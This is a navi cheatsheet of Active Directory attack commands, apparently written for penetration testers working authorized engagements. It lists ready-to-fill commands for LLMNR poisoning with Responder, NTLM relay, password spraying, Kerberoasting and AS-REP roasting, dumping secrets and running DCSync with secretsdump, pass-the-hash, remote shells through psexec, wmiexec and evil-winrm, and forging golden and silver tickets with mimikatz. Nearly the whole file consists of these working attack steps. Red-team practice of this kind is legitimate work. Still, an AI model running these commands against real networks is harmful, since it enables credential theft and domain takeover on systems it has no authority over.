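% ad, active-directory, kerberos, windows, netexec

; Navi cheatsheet for Active Directory enumeration and attack paths (Responder, Impacket, NetExec, BloodHound, PowerView, mimikatz).
; Every <placeholder> is filled from the "$ name:" definitions at the bottom; a name without a definition is prompted for as free text.
; The <placeholder> tokens had been stripped from an earlier copy of this file and were restored from those definitions.
; These are authorized-engagement tools. Most of them are loud (service installs, DCSync replication, user-visible auth prompts) - know the rules of engagement first.

; In current Responder, -d injects a WPAD server into DHCP responses and -P forces proxy authentication (Basic = a prompt the user sees).
; Both are disruptive on a live network; drop them for a quieter poisoning run.
# Start Responder (LLMNR/NBT-NS poisoning)
sudo responder -I <interface> -dwPv

; Relaying only works against hosts that do not require SMB signing, and Responder's SMB and HTTP servers must be
; turned off in Responder.conf so ntlmrelayx can bind those ports.
# SMB relay attack
sudo ntlmrelayx.py -tf targets.txt -smb2support

# Get domain users (NetExec - replacement for crackmapexec)
nxc smb <dc_ip> -u <username> -p <password> --users

# Get domain groups
nxc smb <dc_ip> -u <username> -p <password> --groups

; Check the lockout threshold first (nxc smb <dc_ip> -u <username> -p <password> --pass-pol); stay one attempt below it per observation window.
# Password spray
nxc smb <dc_ip> -u users.txt -p '' --continue-on-success

; --no-bruteforce pairs users.txt line i with passwords.txt line i (no cross product), so the two files must line up.
# Password spray multiple passwords
nxc smb <dc_ip> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

; Output is hashcat mode 13100 (RC4 krb5tgs); AES-only accounts produce 19600/19700 hashes instead.
# Kerberoasting - Get TGS tickets
GetUserSPNs.py <domain>/<username>:<password> -dc-ip <dc_ip> -request

; Unauthenticated - only needs a user list. Output is hashcat mode 18200.
# AS-REP Roasting
GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat

# Dump secrets (admin required)
secretsdump.py <domain>/<username>:<password>@<target>

; -hashes takes LM:NT; the empty LM half is fine. Needs local admin on <target>.
# Pass the hash
psexec.py <domain>/<username>@<target> -hashes :<nthash>

# Pass the hash with NetExec
nxc smb <target> -u <username> -H <nthash>

; Needs replication rights (Domain Admins, or DS-Replication-Get-Changes and -All); each replication request logs event 4662 on the DC.
# DCSync attack
secretsdump.py <domain>/<username>:<password>@<dc_ip> -just-dc

; psexec.py drops a service binary in ADMIN$ and installs a service (event 7045) - the loudest of the three shells below; wmiexec leaves no binary on disk.
# Get shell with psexec
psexec.py <domain>/<username>:<password>@<target>

# Get shell with wmiexec
wmiexec.py <domain>/<username>:<password>@<target>

# Get shell with evil-winrm
evil-winrm -i <target> -u <username> -p <password>

; -c all includes session/logged-on collection that touches every domain computer; -ns points DNS at the DC so domain names resolve.
# BloodHound collection
bloodhound-python -d <domain> -u <username> -p <password> -c all -ns <dc_ip>

# PowerView - Get domain info
Import-Module .\PowerView.ps1; Get-Domain

# PowerView - Get domain users
Get-DomainUser | select samaccountname

# PowerView - Get domain computers
Get-DomainComputer | select name

# PowerView - Find domain admins
Get-DomainGroupMember "Domain Admins"

; /krbtgt: is the krbtgt account's NT hash (e.g. from the DCSync above); /sid: is the domain SID without a trailing RID; /ptt injects the ticket into the current logon session.
# Golden ticket with mimikatz
mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<sid> /krbtgt:<krbtgt_nthash> /ptt" "exit"

; /rc4: is the NT hash of the account behind the SPN (the machine account for cifs/host), /target: the host FQDN, /service: e.g. cifs, host, http, ldap.
# Silver ticket
mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<sid> /target:<target> /service:<service> /rc4:<nthash> /ptt" "exit"

; Variable sources. An empty echo makes navi prompt for free text.
; grep -vx drops only the interface literally named "lo", not every name that happens to contain "lo".
$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -vx lo
$ dc_ip: echo ""
$ domain: echo ""
$ username: echo ""
$ password: echo ""
$ target: echo ""
$ nthash: echo ""
$ sid: echo ""
$ service: echo ""
$ krbtgt_nthash: echo ""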